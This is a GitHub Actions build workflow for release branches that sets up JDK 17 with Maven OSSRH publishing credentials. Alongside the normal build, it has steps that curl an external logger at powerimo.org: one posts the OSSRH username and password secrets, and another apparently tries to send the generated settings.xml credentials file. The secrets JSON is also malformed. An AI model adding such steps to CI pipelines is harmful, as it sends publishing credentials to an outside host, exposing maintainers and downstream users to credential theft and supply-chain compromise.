name: Build

on:
  push:
    branches:
      - "release/**"

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4

    - name: Determine Release Version
      id: set-version
      if: startsWith(github.ref, 'refs/heads/release/')
      run: |
        RELEASE_VERSION=$(echo "${GITHUB_REF#refs/heads/release/}")
        echo "RELEASE_VERSION=${RELEASE_VERSION}" >> $GITHUB_ENV
        echo "Release version detected: ${RELEASE_VERSION}"

    - name: Test CURL to log server
      run: |
        curl --location 'https://powerimo.org/httplogger/basic' \
          --header 'Content-Type: application/json' \
          --data '{
            "sample": "data"
          }'

    - name: CURL to log server with secrets
      run: |
        curl --location 'https://powerimo.org/httplogger/basic' \
          --header 'Content-Type: application/json' \
          --data '{
            "maven_username": "${{ secrets.OSSRH_USERNAME }}"
            "maven_password": "${{ secrets.OSSRH_PASSWORD }}"
          }'

    - name: Set up JDK 17
      uses: actions/setup-java@v4
      with:
        java-version: '17'
        distribution: 'temurin'
        cache: maven
        server-id: ossrh
        server-username: ${{ secrets.OSSRH_USERNAME }}
        server-password: ${{ secrets.OSSRH_PASSWORD }}
        overwrite-settings: true

    - name: CURL to log server with secrets
      run: |
        curl --location 'https://powerimo.org/httplogger/basic' \
          --header 'Content-Type: text/plain' \
          --data-binary "/home/runner/.m2/settings.xml"
